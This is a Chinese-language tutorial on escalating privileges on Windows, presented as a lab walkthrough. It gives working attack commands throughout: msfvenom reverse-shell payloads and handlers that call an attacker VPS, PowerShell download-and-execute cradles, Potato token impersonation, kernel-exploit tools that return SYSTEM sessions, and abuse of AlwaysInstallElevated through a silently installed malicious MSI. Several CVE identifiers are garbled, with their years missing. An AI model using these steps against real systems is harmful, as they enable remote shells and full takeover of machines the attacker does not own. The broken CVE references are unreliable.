windows系统提权
权限提升简介权限提升概述什么是提权提权分类提权条件Windows提权思路Windows系统提权Windows提权信息收集WMIC信息收集自动信息收集提权工具脚本环境搭建提权Windows内核漏洞提权快速查找提权工具自动化查询报错解决提权复现-CVE--0803提权复现-CVE--0708Windows系统服务漏洞Always Install Elevated提权权限提升简介
权限提升概述
windows系统常见的权限:
用户权限管理员权限系统权限访客权限
什么是提权
权限提升(privilege escalation):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权到高权限的管理员用户,从而获得对整个系统得控制权。
Windows:user --> administratorLinux:user --> root
提权分类
本地提权:在一个低权限用户下,通过一些条件(应用程序漏洞、系统漏洞等)直接提升到系统最高权限。
远程提权:攻击者通过漏洞利用程序直接获取远程服务器的权限。
操作系统提权:
Windows:MS06-067、MS10-084、MS11-014、MS11-05、MS12-020、MS16-032等
Linux:CVE--7308、CVE--6074、CVE--5123、CVE--9793、CVE--5195等
应用程序提权:SQL Server、MySQL、Oracle
提权条件
拥有Webshell,普通用户权限拥有某些软件的账号密码本地或远程服务器上存在漏洞拥有漏洞利用工具代码Windows提权思路
前期信息收集Meterpreter提权Windows系统内核漏洞Windows服务漏洞Windows系统提权
Windows提权信息收集
生成msf木马。msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=your-vps-ip lport=6666 -f exe -o demo.exe
监听并且运行木马文件,获取会话。
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST your-vps-ipset LPORT 6666exploit
WMIC信息收集
WMIC:Windows管理工具命令行,提供了从命令行接口和批命令脚本执行系统管理的支持,对于信息收集和渗透测试是非常实用的。
wmic信息提取脚本:wmic_info.bat
提取进程、服务、用户帐号、用户组、网络接口、硬盘信息、网络共享信息、安装Windows补丁、程序在启动运行、安装的软件列表、操作系统、时区等信息。
补丁信息、补丁包过滤
wmic qfe get Caption,Description,HotFixID,InstalledOnwmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:“KBxxxxxx” /C:“KBxxxxxx”
获取杀软名:
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
获取杀软名和安装路径:
WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState,pathToSignedProductExe
组帐户管理
wmic group
已安装操作系统的管理
wmic os
进程管理
wmic process
服务应用程序管理
wmic service
用户帐户管理
wmic useraccount
当用户登录到计算机系统时自动运行的命令的管理
wmic startup
自动信息收集
Host Information Gathering Script:HIGS.bat
下载地址:
/myh0st/scripts/blob/master/Windows%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86
使用方法:将HIGS.bat在目标机器上运行即可收集信息。
提权工具脚本
环境搭建
配置web服务器。
左下角开始=>管理工具=>服务器管理器=>角色
勾选WEB服务,一直下一步到结束。
点击功能,勾选以下功能。
点击Internet信息服务,访问浏览器查看是否搭建完成。
成功搭建界面。
在web目录上传aspx文件,使用蚁剑连接,默认我们已经拿到shell。
连接成功后,查看权限。
iis apppool\defaultapppool:iis的服务权限。
提权
前提拿到webshell
web路径:C:\inetpub\wwwroot\aspnet_client\system_web\2_0_50727
我们将它上线到MSF,将木马文件上传到连接目录下。
发现报错,显示没有权限这时我们找到tmep目录进行上传。
在windows中temp目录默认所有用户有写入、执行的权限;在linux中tmp目录也一样
我们更换为temp目录下的文件夹上传。成功!
运行木马,上线msf。
得到会话。
RottenPotato:将服务帐户本地提权至SYSTEMload incognitolist_token –uupload /root/ubunut/Potato.exe .execute -Hc -f Potato.exeimpersonate_token "NT AUTHORITY\SYSTEM"
查看令牌。
list_tokens -u
加载模块。 上传土豆到web目录。
/home/ubuntu/Potato.exe:绝对目录. :当前文件夹dir:查看是否上传成功
运行potato.exe
-HC:隐藏进程-f:指定名字872:pid
伪装登录令牌
没有找到令牌,我们换个方式尝试。
Origin Potato :
/foxglovesec/Potato
RottenPotato & JuicyPotato:
/ohpe/juicy-potato
RoguePotato:
/antonioCoco/RoguePotato
SweetPotato:
/CCob/SweetPotato
Webshell下执行命令:
/uknowsec/SweetPotato/uknowsec/getSystem
Windows内核漏洞提权
提权信息收集
检查Windows版本是否有任何已知的漏洞:
systeminfo | findstr /B /C:“OS Name” /C:“OS Version”wmic qfe get Caption,Description,HotFixID,InstalledOn
列出所有补丁:
powershell -c "Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid}
列出安全更新补丁:
powershell -c "Get-Hotfix -description 'Security update'"
快速查找提权
在线网站查询补丁对应漏洞:
/tiquan
工具自动化查询
/rasta-mouse/Watsonwget /rasta-mouse/Sherlock/master/Sherlock.ps1
文件在vps下载后,在文件所在目录启动http服务。
python3 -m http.server
在目标机器运行
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://your-vps-ip:8000/Sherlock.ps1');Find-AllVulns
CVEID:漏洞编号LINK:POC地址
windows-kernel-exploits(Windows平台提权漏洞集合):
/SecWiki/windows-kernel-exploits
检测脚本windows-exploit-suggester.py。
更新库:
python2 windows-exploit-suggester.py --update
完成后即可在同目录看到xls文件。
使用:
在目标机器导入systeminfo。
systeminfo >> info.txt #将结果输出的info.txt
将生成的info.txt文件和windows-exploit-suggester.py脚本放在一起。
python2 windows-exploit-suggester.py --database -08-10-mssb.xls --systeminfo info.txt
M是可能存在的:
E:不存在的:
报错解决
No matching distribution found for python-xlrd解决方案:
pip2 install xlrd --upgrade
xlrd.biffh.XLRDError: Excel xlsx file; not supported
原因:xlrd版本太高,换旧版即可。xlrd更新到了2.0.1版本,只支持.xls文件。所以解析xlsx文件会报错。
解决方案:
pip2 uninstall xlrd
pip2 install xlrd==1.2.0
提权复现-CVE--0803
漏洞利用工具:
/k8gege/K8tools/raw/master/CVE--0803.exe
假设我们已经getshell。
在目标主机运行木马文件。
cve--0803 cmd "whoami" 检测是否存在漏洞
cve--0803 cmd "start demo11111.exe" 反弹system权限会话至msf上
提权复现-CVE--0708
poc下载地址:
/cbwang505/CVE--0787-EXP-ALL-WINDOWS-VERSION/releases/tag/1
必须拿到远程桌面或者远程会话才可以得到system权限。
直接运行即可。
Windows系统服务漏洞
Always Install Elevated
任意用户以NT AUTHORITY\SYSTEM权限安装 msi。
AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。
MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序
Always Install Elevated(判断是否激活Always Install Elevated)
将PowerUp.ps1文件上传到vps(没有的话可以问我要)vps开启http服务
python3 -m http.server
判断是否激活。
powershell -ep bypass iex(new-objectnet.webclient).downloadstring('http://vps-ip:8000/PowerUp.ps1');GetRegistryAlwaysInstallElevated
False:没有开启。
在测试环境启用AlwaysInstallElevated,命令如下:
reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
通过注册表判断
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
如果没有注册表项的话,那就代表没有开启,反之显示0x1则代表开启
图形化可通过gpedit.msc,路径为计算机设置\管理模版\windows组件\windows installer,选中已启用即可,需要管理员权限:
Always Install Elevated提权
下载exemsi。msf生成exe程序msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=9090 LHOST=vps-ip -f exe >a.exe
开启监听。
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost vps-ipset lport 23456exploit -j
使用exemsi将exe封装为msi。
配置样式为下图所示,其他默认即可。
下面一直NEXT到最后
这里选择否。
浏览目录,把生成的msi文件上传到目标主机。
打开cmd界面,运行msi程序,得到system权限的shell。
目标机器上执行:msiexec /quiet /qn /i a.msi
msiexec参数:
